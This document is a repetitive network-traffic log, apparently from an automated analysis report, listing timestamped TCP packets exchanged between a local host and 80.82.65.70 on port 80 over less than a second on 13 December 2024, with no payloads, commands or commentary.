                                          Dec 13, 2024 08:36:34.129973888 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.130013943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.132071972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.132129908 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.188554049 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.188620090 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.188663006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.188704014 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.189212084 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.189259052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.189302921 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.190684080 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.190747023 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.190783978 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.190826893 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.192178965 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.192262888 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.192332983 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.192560911 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.193644047 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.193691015 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.193830967 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.194102049 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.195120096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.195166111 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.195223093 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.195262909 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.196620941 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.196670055 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.196729898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.196768999 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.198071003 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.198127031 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.198497057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.198632956 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.199455023 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.199513912 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.199604034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.199734926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.200872898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.200922966 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.200965881 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.201013088 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.202280998 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.202353954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.202358007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.202397108 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.203649044 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.203701019 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.203753948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.203805923 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.205051899 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.205104113 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.205187082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.205229998 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.206453085 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.206504107 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.206557035 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.206598997 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.207876921 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.207928896 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.207950115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.207992077 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.209228992 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.209281921 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.209328890 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.209367990 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.210603952 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.210665941 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.210768938 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.210809946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.212119102 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.212176085 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.212244034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.212286949 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.213541031 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.213804007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.213813066 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.213850975 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.214819908 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.215027094 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.215085983 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.215126991 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.216201067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.216257095 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.216316938 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.216469049 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.217658997 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.217773914 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.218036890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.219011068 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.219063044 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.219105959 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.220428944 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.220487118 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.220627069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.220670938 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.221848011 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.221904993 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.221924067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.221966982 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.223170042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.223220110 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.223259926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.224580050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.224649906 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.224693060 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.224737883 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.226002932 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.226058006 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.226080894 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.226121902 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.227372885 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.227446079 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.227507114 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.227554083 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.228756905 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.228846073 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.228889942 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.230169058 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.230287075 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.230298042 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.230329037 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.231540918 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.231633902 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.231736898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.231942892 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.232935905 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.232980967 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.232985020 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.233026981 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.234431982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.234493017 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.234520912 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.234561920 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.235754967 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.235810995 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.235850096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.235893011 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.237128973 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.237183094 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.237252951 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.237296104 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.238497019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.238562107 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.238611937 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.238861084 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.240025043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.240077972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.240093946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.240120888 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.241348982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.241394043 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.241415977 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.241807938 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.242742062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.242789030 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.242791891 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.242841005 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.244092941 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.244142056 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.244179964 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.244220972 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.245531082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.245584011 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.245795965 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.245839119 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.246875048 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.246929884 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.246963024 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.247005939 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.248282909 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.248337030 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.248378992 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.248420000 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.249773979 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.249819994 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.249872923 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.249912024 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.251079082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.251133919 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.251564980 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.251652956 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.252458096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.252526999 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.252568960 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.253871918 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.253916979 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.253983021 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.254023075 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.320812941 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.320909977 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.320970058 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.321259022 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.321352959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.321399927 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.322700977 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.322755098 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.322789907 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.322832108 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.324006081 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.324059963 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.324127913 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.324171066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.380007029 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.380084991 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.380120039 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.380161047 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.380393028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.380435944 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.380471945 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.380508900 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.381293058 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.381337881 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.381464005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.381505013 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.382175922 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.382224083 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.382272005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.382313967 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.383071899 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.383116961 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.383168936 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.383208036 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.383985043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.384030104 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.384058952 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.384099007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.384896040 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.384907961 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.384946108 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.384974957 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.385745049 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.385812044 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.385848045 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.385888100 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.386647940 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.386696100 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.386837959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.386882067 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.387520075 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.387639999 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.387655020 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.387677908 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.388513088 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.388559103 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.388583899 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.388623953 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.389328957 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.389379025 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.389426947 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.389467955 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.390221119 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.390383005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.390424967 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.391135931 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.391180992 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.391247034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.391290903 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.391999960 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.392070055 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.392101049 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.392112970 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.392887115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.392930031 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.393013000 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.393054008 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.393780947 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.393824100 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.393863916 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.393904924 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.394717932 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.394762039 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.394908905 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.394952059 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.395584106 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.395706892 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.395752907 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.396485090 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.396589041 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.396635056 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.397378922 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.397453070 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.397491932 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.397536993 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.398268938 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.398288012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.398333073 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.399177074 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.399219990 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.399465084 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.399626970 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.400120974 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.400163889 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.400177956 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.400366068 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.400949955 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.401002884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.401076078 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.401824951 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.401880026 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.401940107 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.401982069 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.402740955 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.402786016 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.402847052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.402888060 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.403645039 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.403690100 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.403697968 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.403737068 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.404525042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.404575109 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.404613018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.404654026 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.405420065 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.405463934 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.405567884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.405607939 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.406321049 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.406392097 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.406430006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.406471014 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.407205105 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.407298088 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.407350063 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.408087969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.408135891 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.408186913 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.408226013 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.408972979 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.409029007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.409089088 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.409132957 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.409930944 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.409961939 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.410008907 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.410804033 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.410850048 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.410850048 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.410890102 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.411703110 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.411753893 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.411775112 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.411813021 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.412583113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.412642002 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.412770033 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.412811995 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.413476944 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.413527966 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.413589954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.413630962 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.414336920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.414395094 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.414530039 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.414572954 CET4977280192.168.2.480.82.65.70
